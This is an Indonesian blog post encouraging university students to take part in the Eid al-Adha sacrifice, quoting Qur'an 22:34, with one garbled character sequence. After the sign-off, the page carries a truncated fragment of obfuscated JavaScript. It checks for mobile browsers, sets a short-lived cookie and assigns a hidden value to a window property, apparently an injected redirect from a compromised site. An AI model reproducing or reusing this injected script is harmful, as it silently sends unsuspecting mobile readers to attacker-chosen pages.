Semangat Berkurban dalam Jiwa Mahasiwa

Bulan Dzulhijjah akan segera tiba mendatangi kita semua. Presiden, Menteri, Guru, Pemulung, tukang becak dan semua orang akan merasakan dan mendapati bulan Dzulhijjah. Semua orang akan merasakan hal itu. Tanpa ada terkecuali, Termasuk Mahasiswa. Ya, Mahasiswa juga mendapatkan bulan Dzulhijjah yang setiap tahunnya memeriahkan suasana kampung, sudut kota bahkan Negara yang mayoritas Islam.

Mahasiswa mayoritas memiliki jiwa dan gelora yang menggebu dalam hal bersosial. Termasuk berkurban untuk masyarakat yang kurang mampu. Mahasiswa juga dikenal dengan orang yang merantau untuk dari daerah asal pergi ke suatu daerah yang ditujukan untuk menuntut ilmu.

Namun walaupun mahasiswa jauh dari orangtua, tidak menyurutkan semangat mahasiswa untuk tidak berkurban. Banyak cara yang dilakukan oleh para mahasiswa untuk melaksanakan kurban. Salah satunya dengan menggalang dana, mengajukan proposal, mendatangi donatur dan berbagai cara lainnya untuk bisa berkurban. Banyak aktivis mahasiswa yang jauh-jauh hari telah membentuk panitia kurban dengan semangat yang kuat demi dapat berkurban disetiap tahunnya. Ini adalah salah satunya yang perlu dipersiapkan dan dilakukan oleh mahasiswa menghadapi bulan dzulhijjah. Semangat mahasiswa tidak akan luntur bila manakala diingatkan kembali dengan ayat:

Dan bagi tiap-tiap umat telah Kami syariatkan penyembelihan (kurban), supaya mereka menyebut nama Allah terhadap binatang ternak yang telah direzkikan Allah kepada mereka, maka Tuhanmu ialah Tuhan Yang Maha Esa, karena itu berserah dirilah kamu kepada-Nya. Dan berilah kabar gembira kepada orang-orang yang tunduk patuh (kepada Allah)ai??? (Qs. Al Hajj : 34)

Nur Aji Priambodo,

IKSADA

Bimbingan dan Konseling

Tetap semangat! dan Kobarkan semangat itu kepada jiwa-jiwa mahasiswa yang didalamnya memiliki kepedulian terhadap sesama, terutama terhadap orang yang memerlukan dan pantas menerima kurban. v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}